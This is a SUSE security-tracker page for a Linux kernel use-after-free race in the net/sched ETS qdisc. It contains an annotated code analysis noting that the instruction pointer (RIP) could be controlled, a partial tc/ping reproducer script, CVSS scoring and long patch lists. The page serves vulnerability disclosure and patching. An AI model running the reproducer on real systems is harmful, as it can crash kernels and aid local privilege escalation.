Upstream information
Description
In the Linux kernel, the following vulnerability has been resolved:net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
zdi-disclosures@trendmicro.com says:
The vulnerability is a race condition between `ets_qdisc_dequeue` and
`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.
Attacker requires the capability to create new user and network namespace
in order to trigger the bug.
See my additional commentary at the end of the analysis.
Analysis:
static int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,
struct netlink_ext_ack *extack)
{
...
// (1) this lock is preventing .change handler (`ets_qdisc_change`)
//to race with .dequeue handler (`ets_qdisc_dequeue`)
sch_tree_lock(sch);
for (i = nbands; i < oldbands; i++) {
if (i >= q->nstrict && q->classes[i].qdisc->q.qlen)
list_del_init(&q->classes[i].alist);
qdisc_purge_queue(q->classes[i].qdisc);
}
WRITE_ONCE(q->nbands, nbands);
for (i = nstrict; i < q->nstrict; i++) {
if (q->classes[i].qdisc->q.qlen) {
// (2) the class is added to the q->active
list_add_tail(&q->classes[i].alist, &q->active);
q->classes[i].deficit = quanta[i];
}
}
WRITE_ONCE(q->nstrict, nstrict);
memcpy(q->prio2band, priomap, sizeof(priomap));
for (i = 0; i < q->nbands; i++)
WRITE_ONCE(q->classes[i].quantum, quanta[i]);
for (i = oldbands; i < q->nbands; i++) {
q->classes[i].qdisc = queues[i];
if (q->classes[i].qdisc != &noop_qdisc)
qdisc_hash_add(q->classes[i].qdisc, true);
}
// (3) the qdisc is unlocked, now dequeue can be called in parallel
// to the rest of .change handler
sch_tree_unlock(sch);
ets_offload_change(sch);
for (i = q->nbands; i < oldbands; i++) {
// (4) we're reducing the refcount for our class's qdisc and
// freeing it
qdisc_put(q->classes[i].qdisc);
// (5) If we call .dequeue between (4) and (5), we will have
// a strong UAF and we can control RIP
q->classes[i].qdisc = NULL;
WRITE_ONCE(q->classes[i].quantum, 0);
q->classes[i].deficit = 0;
gnet_stats_basic_sync_init(&q->classes[i].bstats);
memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats));
}
return 0;
}
Comment:
This happens because some of the classes have their qdiscs assigned to
NULL, but remain in the active list. This commit fixes this issue by always
removing the class from the active list before deleting and freeing its
associated qdisc
Reproducer Steps
(trimmed version of what was sent by zdi-disclosures@trendmicro.com)
```
DEV="${DEV:-lo}"
ROOT_HANDLE="${ROOT_HANDLE:-1:}"
BAND2_HANDLE="${BAND2_HANDLE:-20:}" # child under 1:2
PING_BYTES="${PING_BYTES:-48}"
PING_COUNT="${PING_COUNT:-200000}"
PING_DST="${PING_DST:-127.0.0.1}"
SLOW_TBF_RATE="${SLOW_TBF_RATE:-8bit}"
SLOW_TBF_BURST="${SLOW_TBF_BURST:-100b}"
SLOW_TBF_LAT="${SLOW_TBF_LAT:-1s}"
cleanup() {
tc qdisc del dev "$DEV" root 2>/dev/null
}
trap cleanup EXIT
ip link set "$DEV" up
tc qdisc del dev "$DEV" root 2>/dev/null || true
tc qdisc add dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2
tc qdisc add dev "$DEV" parent 1:2 handle "$BAND2_HANDLE" \
tbf rate "$SLOW_TBF_RATE" burst "$SLOW_TBF_BURST" latency "$SLOW_TBF_LAT"
tc filter add dev "$DEV" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2
tc -s qdisc ls dev $DEV
ping -I "$DEV" -f -c "$PING_COUNT" -s "$PING_BYTES" -W 0.001 "$PING_DST" \
>/dev/null 2>&1 &
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 0
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2
tc -s qdisc ls dev $DEV
tc qdisc del dev "$DEV" parent
---truncated---
Upstream Security Advisories:
SUSE information
Overall state of this security issue: Resolved
This issue is currently rated as having important severity.
| CVSS detail | SUSE |
|---|---|
| Base Score | 7 |
| Vector | CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H |
| Attack Vector | Local |
| Attack Complexity | High |
| Privileges Required | Low |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
| CVSSv3 Version | 3.1 |
Note from the SUSE Security Team on the kernel-default package
SUSE will no longer fix all CVEs in the Linux Kernel anymore, but declare some bug classes as won't fix. Please refer to TID 21496 for more details. SUSE Bugzilla entries: 1256645 [IN_PROGRESS], 1258005 [NEW]SUSE Security Advisories:
- SUSE-SU-2026:0447-1, published 2026-02-11T14:05:12Z
- SUSE-SU-2026:0472-1, published 2026-02-12T11:26:05Z
- SUSE-SU-2026:0587-1, published 2026-02-20T10:04:29Z
- SUSE-SU-2026:0928-1, published 2026-03-18T13:32:23Z
- SUSE-SU-2026:0961-1, published 2026-03-23T09:08:52Z
- SUSE-SU-2026:0984-1, published 2026-03-23T22:20:54Z
- SUSE-SU-2026:1003-1, published 2026-03-25T09:25:51Z
- SUSE-SU-2026:1041-1, published 2026-03-25T14:13:36Z
- SUSE-SU-2026:1077-1, published 2026-03-26T12:42:31Z
- SUSE-SU-2026:1081-1, published 2026-03-26T13:23:57Z
- SUSE-SU-2026:1131-1, published 2026-03-27T16:02:22Z
- SUSE-SU-2026:1684-1, published 2026-05-05T06:34:23Z
- SUSE-SU-2026:1686-1, published 2026-05-05T06:34:31Z
- SUSE-SU-2026:1691-1, published 2026-05-05T07:04:40Z
- SUSE-SU-2026:1694-1, published 2026-05-06T00:22:33Z
- SUSE-SU-2026:1698-1, published 2026-05-06T01:49:45Z
- SUSE-SU-2026:1708-1, published 2026-05-06T11:04:11Z
- SUSE-SU-2026:1710-1, published 2026-05-06T11:38:10Z
- SUSE-SU-2026:1725-1, published 2026-05-06T16:04:08Z
- SUSE-SU-2026:1728-1, published 2026-05-06T21:38:02Z
- SUSE-SU-2026:1733-1, published 2026-05-07T09:04:22Z
- SUSE-SU-2026:1735-1, published 2026-05-07T02:34:47Z
- SUSE-SU-2026:1770-1, published 2026-05-08T11:05:12Z
- SUSE-SU-2026:1771-1, published 2026-05-08T11:05:28Z
- SUSE-SU-2026:1776-1, published 2026-05-08T12:33:55Z
- SUSE-SU-2026:1787-1, published 2026-05-09T03:34:11Z
- SUSE-SU-2026:1793-1, published 2026-05-09T11:34:27Z
- SUSE-SU-2026:1798-1, published 2026-05-09T13:04:52Z
- SUSE-SU-2026:1801-1, published 2026-05-09T13:05:07Z
- SUSE-SU-2026:1804-1, published 2026-05-09T16:04:42Z
- SUSE-SU-2026:20477-1, published 2026-02-24T09:10:50Z
- SUSE-SU-2026:20479-1, published 2026-02-24T10:42:46Z
- SUSE-SU-2026:20498-1, published 2026-02-24T10:42:46Z
- SUSE-SU-2026:20520-1, published 2026-02-24T10:42:46Z
- SUSE-SU-2026:20555-1, published 2026-02-27T11:23:36Z
- SUSE-SU-2026:20570-1, published 2026-02-27T11:32:45Z
- SUSE-SU-2026:20599-1, published 2026-02-27T13:03:55Z
- SUSE-SU-2026:20615-1, published 2026-02-27T11:32:45Z
- SUSE-SU-2026:20772-1, published 2026-03-23T12:44:30Z
- SUSE-SU-2026:20794-1, published 2026-03-23T11:29:16Z
- SUSE-SU-2026:20819-1, published 2026-03-23T11:29:16Z
- SUSE-SU-2026:20845-1, published 2026-03-24T16:48:25Z
- SUSE-SU-2026:20872-1, published 2026-03-24T16:48:25Z
- SUSE-SU-2026:20876-1, published 2026-03-24T16:48:38Z
- SUSE-SU-2026:21114-1, published 2026-04-13T18:28:29Z
- SUSE-SU-2026:21123-1, published 2026-04-13T16:48:50Z
- SUSE-SU-2026:21129-1, published 2026-04-13T18:28:29Z
- SUSE-SU-2026:21131-1, published 2026-04-13T18:28:29Z
- SUSE-SU-2026:21468-1, published 2026-05-05T13:07:20Z
- SUSE-SU-2026:21469-1, published 2026-05-05T13:07:20Z
- SUSE-SU-2026:21470-1, published 2026-05-05T13:07:20Z
- SUSE-SU-2026:21471-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21472-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21473-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21474-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21475-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21476-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21477-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21479-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21480-1, published 2026-05-05T13:09:59Z
- SUSE-SU-2026:21481-1, published 2026-05-05T13:09:59Z
- SUSE-SU-2026:21482-1, published 2026-05-05T13:09:59Z
- SUSE-SU-2026:21483-1, published 2026-05-05T13:09:59Z
- SUSE-SU-2026:21484-1, published 2026-05-05T13:12:42Z
- SUSE-SU-2026:21485-1, published 2026-05-05T13:12:42Z
- SUSE-SU-2026:21487-1, published 2026-05-05T13:15:02Z
- SUSE-SU-2026:21491-1, published 2026-05-05T14:59:28Z
- SUSE-SU-2026:21495-1, published 2026-05-05T13:10:05Z
- SUSE-SU-2026:21496-1, published 2026-05-05T13:10:05Z
- SUSE-SU-2026:21497-1, published 2026-05-05T13:10:05Z
- SUSE-SU-2026:21498-1, published 2026-05-05T13:10:44Z
- SUSE-SU-2026:21499-1, published 2026-05-05T13:11:23Z
- SUSE-SU-2026:21501-1, published 2026-05-05T13:15:07Z
- SUSE-SU-2026:21503-1, published 2026-05-05T13:18:42Z
- SUSE-SU-2026:21504-1, published 2026-05-05T13:36:02Z
- SUSE-SU-2026:21505-1, published 2026-05-05T14:58:33Z
- SUSE-SU-2026:21506-1, published 2026-05-05T13:07:20Z
- SUSE-SU-2026:21507-1, published 2026-05-05T13:07:20Z
- SUSE-SU-2026:21508-1, published 2026-05-05T13:07:20Z
- SUSE-SU-2026:21509-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21510-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21511-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21512-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21513-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21514-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21515-1, published 2026-05-05T13:07:21Z
- SUSE-SU-2026:21522-1, published 2026-05-05T19:49:32Z
- SUSE-SU-2026:21523-1, published 2026-05-05T19:50:41Z
- SUSE-SU-2026:21526-1, published 2026-05-05T20:45:33Z
- SUSE-SU-2026:21527-1, published 2026-05-05T21:59:39Z
- SUSE-SU-2026:21528-1, published 2026-05-05T22:20:12Z
- SUSE-SU-2026:21529-1, published 2026-05-05T22:29:56Z
- SUSE-SU-2026:21531-1, published 2026-05-05T23:37:29Z
- SUSE-SU-2026:21532-1, published 2026-05-06T09:16:11Z
- SUSE-SU-2026:21533-1, published 2026-05-06T09:35:23Z
- SUSE-SU-2026:21554-1, published 2026-05-05T19:49:32Z
- SUSE-SU-2026:21555-1, published 2026-05-05T19:50:41Z
- SUSE-SU-2026:21562-1, published 2026-05-06T09:16:11Z
- SUSE-SU-2026:21563-1, published 2026-05-06T09:35:23Z
- SUSE-SU-2026:21591-1, published 2026-05-08T08:30:42Z
- SUSE-SU-2026:21598-1, published 2026-05-08T08:30:42Z
List of released packages
| Product(s) | Fixed package version(s) | References |
|---|---|---|
| Container suse/sl-micro/6.0/baremetal-os-container:2.1.3-6.172 |
| |
| Container suse/sl-micro/6.0/base-os-container:2.1.3-7.141 |
| |
| Container suse/sl-micro/6.0/kvm-os-container:2.1.3-6.155 |
| |
| Container suse/sl-micro/6.0/rt-os-container:2.1.3-7.168 |
| |
| Container suse/sl-micro/6.0/toolbox:13.2-9.106 |
| |
| Container suse/sl-micro/6.1/base-os-container:2.2.1-5.114 Image SL-Micro-Azure Image SL-Micro-BYOS-Azure Image SL-Micro-BYOS-EC2 Image SL-Micro-BYOS-GCE Image SL-Micro-EC2 Image SUSE-Multi-Linux-Manager-Proxy-BYOS-Azure Image SUSE-Multi-Linux-Manager-Proxy-BYOS-EC2 Image SUSE-Multi-Linux-Manager-Proxy-BYOS-GCE Image SUSE-Multi-Linux-Manager-Server-Azure-llc Image SUSE-Multi-Linux-Manager-Server-Azure-ltd Image SUSE-Multi-Linux-Manager-Server-BYOS-Azure Image SUSE-Multi-Linux-Manager-Server-BYOS-EC2 Image SUSE-Multi-Linux-Manager-Server-BYOS-GCE Image SUSE-Multi-Linux-Manager-Server-EC2-llc Image SUSE-Multi-Linux-Manager-Server-EC2-ltd |
| |
| Container suse/sl-micro/6.1/kvm-os-container:2.2.1-5.116 |
| |
| Container suse/sl-micro/6.1/rt-os-container:2.2.1-5.91 |
| |
| Container suse/sle-micro-rancher/5.2:latest |
| |
| Container suse/sle-micro-rancher/5.3:latest Container suse/sle-micro-rancher/5.4:5.4.4.5.106 Image SLES15-SP4-BYOS Image SLES15-SP4-BYOS-Azure Image SLES15-SP4-BYOS-EC2 Image SLES15-SP4-BYOS-GCE Image SLES15-SP4-CHOST-BYOS Image SLES15-SP4-CHOST-BYOS-Aliyun Image SLES15-SP4-CHOST-BYOS-Azure Image SLES15-SP4-CHOST-BYOS-EC2 Image SLES15-SP4-CHOST-BYOS-GCE Image SLES15-SP4-CHOST-BYOS-SAP-CCloud Image SLES15-SP4-HPC-BYOS Image SLES15-SP4-HPC-BYOS-Azure Image SLES15-SP4-HPC-BYOS-EC2 Image SLES15-SP4-HPC-BYOS-GCE Image SLES15-SP4-HPC-EC2 Image SLES15-SP4-HPC-GCE Image SLES15-SP4-Hardened-BYOS Image SLES15-SP4-Hardened-BYOS-Azure Image SLES15-SP4-Hardened-BYOS-EC2 Image SLES15-SP4-Hardened-BYOS-GCE Image SLES15-SP4-Micro-5-3-BYOS Image SLES15-SP4-Micro-5-3-BYOS-Azure Image SLES15-SP4-Micro-5-4-BYOS Image SLES15-SP4-Micro-5-4-BYOS-Azure Image SLES15-SP4-SAP Image SLES15-SP4-SAP-Azure Image SLES15-SP4-SAP-EC2 Image SLES15-SP4-SAP-GCE Image SLES15-SP4-SAPCAL Image SLES15-SP4-SAPCAL-Azure Image SLES15-SP4-SAPCAL-EC2 Image SLES15-SP4-SAPCAL-GCE |
| |
| Container suse/sle-micro/base-5.5:2.0.4-5.8.254 Image SLES15-SP5-BYOS-Azure Image SLES15-SP5-BYOS-EC2 Image SLES15-SP5-BYOS-GCE Image SLES15-SP5-CHOST-BYOS-Aliyun Image SLES15-SP5-CHOST-BYOS-Azure Image SLES15-SP5-CHOST-BYOS-EC2 Image SLES15-SP5-CHOST-BYOS-GCE Image SLES15-SP5-CHOST-BYOS-GDC Image SLES15-SP5-CHOST-BYOS-SAP-CCloud Image SLES15-SP5-EC2 Image SLES15-SP5-GCE Image SLES15-SP5-HPC-BYOS-Azure Image SLES15-SP5-HPC-BYOS-EC2 Image SLES15-SP5-HPC-BYOS-GCE Image SLES15-SP5-Hardened-BYOS-Azure Image SLES15-SP5-Hardened-BYOS-EC2 Image SLES15-SP5-Hardened-BYOS-GCE Image SLES15-SP5-Micro-5-5 Image SLES15-SP5-Micro-5-5-Azure Image SLES15-SP5-Micro-5-5-BYOS Image SLES15-SP5-Micro-5-5-BYOS-Azure Image SLES15-SP5-Micro-5-5-EC2 Image SLES15-SP5-SAPCAL-Azure Image SLES15-SP5-SAPCAL-EC2 Image SLES15-SP5-SAPCAL-GCE |
| |
| Container suse/sle-micro/kvm-5.5:2.0.4-3.5.489 |
| |
| Container suse/sle-micro/rt-5.5:latest |
| |
| Image SL-Micro |
| |
| Image SLE-Micro Image SLE-Micro-Azure Image SLE-Micro-BYOS Image SLE-Micro-BYOS-Azure Image SLE-Micro-BYOS-EC2 Image SLE-Micro-BYOS-GCE Image SLE-Micro-EC2 Image SLE-Micro-GCE |
| |
| Image SLES-Azure-3P Image SLES-Azure-Basic Image SLES-Azure-Standard Image SLES-BYOS-Azure Image SLES-BYOS-EC2 Image SLES-BYOS-GCE Image SLES-CHOST-BYOS-Aliyun Image SLES-CHOST-BYOS-Azure Image SLES-CHOST-BYOS-EC2 Image SLES-CHOST-BYOS-GCE Image SLES-CHOST-BYOS-GDC Image SLES-CHOST-BYOS-SAP-CCloud Image SLES-EC2 Image SLES-GCE Image SLES-GCE-3P Image SLES-Hardened-BYOS-Azure Image SLES-Hardened-BYOS-EC2 Image SLES-Hardened-BYOS-GCE Image SLES-SAPCAL-Azure Image SLES-SAPCAL-EC2 Image SLES-SAPCAL-GCE |
| |
| Image SLES-SAP-Azure Image SLES-SAP-Azure-3P Image SLES-SAP-BYOS-Azure Image SLES-SAP-BYOS-EC2 Image SLES-SAP-BYOS-GCE Image SLES-SAP-EC2 Image SLES-SAP-GCE Image SLES-SAP-GCE-3P |
| |
| Image SLES15-SP4-SAP-Azure-LI-BYOS Image SLES15-SP4-SAP-Azure-LI-BYOS-Production Image SLES15-SP4-SAP-Azure-VLI-BYOS Image SLES15-SP4-SAP-Azure-VLI-BYOS-Production Image SLES15-SP4-SAP-BYOS Image SLES15-SP4-SAP-BYOS-Azure Image SLES15-SP4-SAP-BYOS-EC2 Image SLES15-SP4-SAP-BYOS-GCE Image SLES15-SP4-SAP-Hardened Image SLES15-SP4-SAP-Hardened-Azure Image SLES15-SP4-SAP-Hardened-BYOS Image SLES15-SP4-SAP-Hardened-BYOS-Azure Image SLES15-SP4-SAP-Hardened-BYOS-EC2 Image SLES15-SP4-SAP-Hardened-BYOS-GCE Image SLES15-SP4-SAP-Hardened-GCE |
| |
| Image SLES15-SP5-SAP-Azure-3P Image SLES15-SP5-SAP-Azure-LI-BYOS Image SLES15-SP5-SAP-Azure-LI-BYOS-Production Image SLES15-SP5-SAP-Azure-VLI-BYOS Image SLES15-SP5-SAP-Azure-VLI-BYOS-Production Image SLES15-SP5-SAP-BYOS-Azure Image SLES15-SP5-SAP-BYOS-EC2 Image SLES15-SP5-SAP-BYOS-GCE Image SLES15-SP5-SAP-Hardened-Azure Image SLES15-SP5-SAP-Hardened-BYOS-Azure Image SLES15-SP5-SAP-Hardened-BYOS-EC2 Image SLES15-SP5-SAP-Hardened-BYOS-GCE Image SLES15-SP5-SAP-Hardened-GCE |
| |
| Image SLES15-SP6-SAP-Azure-3P Image SLES15-SP6-SAP-Azure-LI-BYOS Image SLES15-SP6-SAP-Azure-LI-BYOS-Production Image SLES15-SP6-SAP-Azure-VLI-BYOS Image SLES15-SP6-SAP-Azure-VLI-BYOS-Production Image SLES15-SP6-SAP-BYOS Image SLES15-SP6-SAP-BYOS-Azure Image SLES15-SP6-SAP-BYOS-EC2 Image SLES15-SP6-SAP-BYOS-GCE Image SLES15-SP6-SAP-Hardened Image SLES15-SP6-SAP-Hardened-Azure Image SLES15-SP6-SAP-Hardened-BYOS Image SLES15-SP6-SAP-Hardened-BYOS-Azure Image SLES15-SP6-SAP-Hardened-BYOS-EC2 Image SLES15-SP6-SAP-Hardened-BYOS-GCE Image SLES15-SP6-SAP-Hardened-EC2 Image SLES15-SP6-SAP-Hardened-GCE |
| |
| Image SLES15-SP6 Image SLES15-SP6-BYOS Image SLES15-SP6-BYOS-Azure Image SLES15-SP6-BYOS-EC2 Image SLES15-SP6-BYOS-GCE Image SLES15-SP6-EC2 Image SLES15-SP6-EC2-ECS-HVM Image SLES15-SP6-GCE Image SLES15-SP6-HPC-BYOS Image SLES15-SP6-HPC-BYOS-Azure Image SLES15-SP6-HPC-BYOS-EC2 Image SLES15-SP6-HPC-BYOS-GCE Image SLES15-SP6-HPC-EC2 Image SLES15-SP6-HPC-GCE Image SLES15-SP6-Hardened-BYOS Image SLES15-SP6-Hardened-BYOS-Azure Image SLES15-SP6-Hardened-BYOS-EC2 Image SLES15-SP6-Hardened-BYOS-GCE Image SLES15-SP6-SAP Image SLES15-SP6-SAP-Azure Image SLES15-SP6-SAP-EC2 Image SLES15-SP6-SAP-GCE Image SLES15-SP6-SAPCAL Image SLES15-SP6-SAPCAL-Azure Image SLES15-SP6-SAPCAL-EC2 Image SLES15-SP6-SAPCAL-GCE |
| |
| Image SLES15-SP7-Azure-3P Image SLES15-SP7-Azure-Basic Image SLES15-SP7-Azure-Standard Image SLES15-SP7-HPC-Azure |
| |
| Image SLES15-SP7-BYOS-Azure Image SLES15-SP7-BYOS-EC2 Image SLES15-SP7-BYOS-GCE Image SLES15-SP7-CHOST-BYOS-Aliyun Image SLES15-SP7-CHOST-BYOS-Azure Image SLES15-SP7-CHOST-BYOS-EC2 Image SLES15-SP7-CHOST-BYOS-GCE Image SLES15-SP7-CHOST-BYOS-GDC Image SLES15-SP7-CHOST-BYOS-SAP-CCloud Image SLES15-SP7-EC2 Image SLES15-SP7-EC2-ECS-HVM Image SLES15-SP7-GCE Image SLES15-SP7-GCE-3P Image SLES15-SP7-HPC-BYOS-Azure Image SLES15-SP7-HPC-BYOS-EC2 Image SLES15-SP7-HPC-BYOS-GCE Image SLES15-SP7-Hardened-BYOS-Azure Image SLES15-SP7-Hardened-BYOS-EC2 Image SLES15-SP7-Hardened-BYOS-GCE Image SLES15-SP7-SAPCAL-Azure Image SLES15-SP7-SAPCAL-EC2 Image SLES15-SP7-SAPCAL-GCE |
| |
| Image SLES15-SP7-SAP-Azure Image SLES15-SP7-SAP-Azure-3P Image SLES15-SP7-SAP-Azure-LI-BYOS-Production Image SLES15-SP7-SAP-Azure-VLI-BYOS-Production Image SLES15-SP7-SAP-BYOS-Azure Image SLES15-SP7-SAP-BYOS-EC2 Image SLES15-SP7-SAP-BYOS-GCE Image SLES15-SP7-SAP-EC2 Image SLES15-SP7-SAP-GCE Image SLES15-SP7-SAP-GCE-3P Image SLES15-SP7-SAP-Hardened-Azure Image SLES15-SP7-SAP-Hardened-BYOS-Azure Image SLES15-SP7-SAP-Hardened-BYOS-EC2 Image SLES15-SP7-SAP-Hardened-BYOS-GCE Image SLES15-SP7-SAP-Hardened-GCE |
| |
| SUSE Linux Enterprise Desktop 15 SP7 |
| Patchnames: SUSE-SLE-Module-Basesystem-15-SP7-2026-1081 SUSE-SLE-Module-Basesystem-15-SP7-2026-447 SUSE-SLE-Module-Development-Tools-15-SP7-2026-1081 SUSE-SLE-Module-Development-Tools-15-SP7-2026-447 SUSE-SLE-Product-WE-15-SP7-2026-1081 SUSE-SLE-Product-WE-15-SP7-2026-447 |
| SUSE Linux Enterprise High Availability Extension 15 SP4 |
| Patchnames: SUSE-SLE-Product-HA-15-SP4-2026-984 |
| SUSE Linux Enterprise High Availability Extension 15 SP7 |
| Patchnames: SUSE-SLE-Product-HA-15-SP7-2026-1081 SUSE-SLE-Product-HA-15-SP7-2026-447 |
| SUSE Linux Enterprise High Availability Extension 16.0 |
| Patchnames: SUSE-SLES-HA-16.0-325 |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS |
| Patchnames: SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-984 |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS |
| Patchnames: SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-984 |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS |
| Patchnames: SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-1003 |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS |
| Patchnames: SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-1003 |
| SUSE Linux Enterprise High Performance Computing 15 SP7 |
| Patchnames: SUSE-SLE-Module-Basesystem-15-SP7-2026-1081 SUSE-SLE-Module-Basesystem-15-SP7-2026-447 SUSE-SLE-Module-Development-Tools-15-SP7-2026-1081 SUSE-SLE-Module-Development-Tools-15-SP7-2026-447 SUSE-SLE-Module-Legacy-15-SP7-2026-1081 SUSE-SLE-Module-Legacy-15-SP7-2026-447 SUSE-SLE-Module-Public-Cloud-15-SP7-2026-1081 SUSE-SLE-Module-Public-Cloud-15-SP7-2026-472 |
| SUSE Linux Enterprise Live Patching 15 SP4 |
| Patchnames: SUSE-SLE-Module-Live-Patching-15-SP4-2026-1733 SUSE-SLE-Module-Live-Patching-15-SP4-2026-1734 SUSE-SLE-Module-Live-Patching-15-SP4-2026-1735 SUSE-SLE-Module-Live-Patching-15-SP4-2026-1776 SUSE-SLE-Module-Live-Patching-15-SP4-2026-1793 SUSE-SLE-Module-Live-Patching-15-SP4-2026-1798 SUSE-SLE-Module-Live-Patching-15-SP4-2026-1799 |
| SUSE Linux Enterprise Live Patching 15 SP5 |
| Patchnames: SUSE-SLE-Module-Live-Patching-15-SP5-2026-1738 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1739 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1746 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1747 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1770 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1794 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1800 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1801 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1804 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1805 SUSE-SLE-Module-Live-Patching-15-SP5-2026-1806 |
| SUSE Linux Enterprise Live Patching 15 SP6 |
| Patchnames: SUSE-SLE-Module-Live-Patching-15-SP6-2026-1727 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1728 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1729 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1771 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1772 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1774 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1787 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1788 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1789 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1795 SUSE-SLE-Module-Live-Patching-15-SP6-2026-1796 |
| SUSE Linux Enterprise Live Patching 15 SP7 |
| Patchnames: SUSE-SLE-Module-Live-Patching-15-SP7-2026-1680 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1681 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1682 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1684 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1685 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1686 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1687 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1688 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1691 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1694 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1695 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1696 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1697 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1698 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1708 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1709 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1710 SUSE-SLE-Module-Live-Patching-15-SP7-2026-1725 SUSE-SLE-Module-Live-Patching-15-SP7-2026-587 |
| SUSE Linux Enterprise Micro 5.2 |
| Patchnames: SUSE-SUSE-MicroOS-5.2-2026-928 SUSE-SUSE-MicroOS-5.2-2026-961 |
| SUSE Linux Enterprise Micro 5.3 |
| Patchnames: SUSE-SLE-Micro-5.3-2026-1131 SUSE-SLE-Micro-5.3-2026-984 |
| SUSE Linux Enterprise Micro 5.4 |
| Patchnames: SUSE-SLE-Micro-5.4-2026-1131 SUSE-SLE-Micro-5.4-2026-984 |
| SUSE Linux Enterprise Micro 5.5 |
| Patchnames: SUSE-SLE-Micro-5.5-2026-1003 SUSE-SLE-Micro-5.5-2026-1077 |
| SUSE Linux Enterprise Module for Basesystem 15 SP7 |
| Patchnames: SUSE-SLE-Module-Basesystem-15-SP7-2026-1081 SUSE-SLE-Module-Basesystem-15-SP7-2026-447 |
| SUSE Linux Enterprise Module for Development Tools 15 SP7 |
| Patchnames: SUSE-SLE-Module-Development-Tools-15-SP7-2026-1081 SUSE-SLE-Module-Development-Tools-15-SP7-2026-447 |
| SUSE Linux Enterprise Module for Legacy 15 SP7 |
| Patchnames: SUSE-SLE-Module-Legacy-15-SP7-2026-1081 SUSE-SLE-Module-Legacy-15-SP7-2026-447 |
| SUSE Linux Enterprise Module for Public Cloud 15 SP7 |
| Patchnames: SUSE-SLE-Module-Public-Cloud-15-SP7-2026-1081 SUSE-SLE-Module-Public-Cloud-15-SP7-2026-472 |
| SUSE Linux Enterprise Real Time 15 SP7 SUSE Real Time Module 15 SP7 |
| Patchnames: SUSE-SLE-Module-RT-15-SP7-2026-587 |
| SUSE Linux Enterprise Server 15 SP4-LTSS |
| Patchnames: SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-984 |
| SUSE Linux Enterprise Server 15 SP5-LTSS |
| Patchnames: SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-1003 |
| SUSE Linux Enterprise Server 15 SP6-LTSS |
| Patchnames: SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-1041 |
| SUSE Linux Enterprise Server 15 SP7 SUSE Linux Enterprise Server for SAP Applications 15 SP7 |
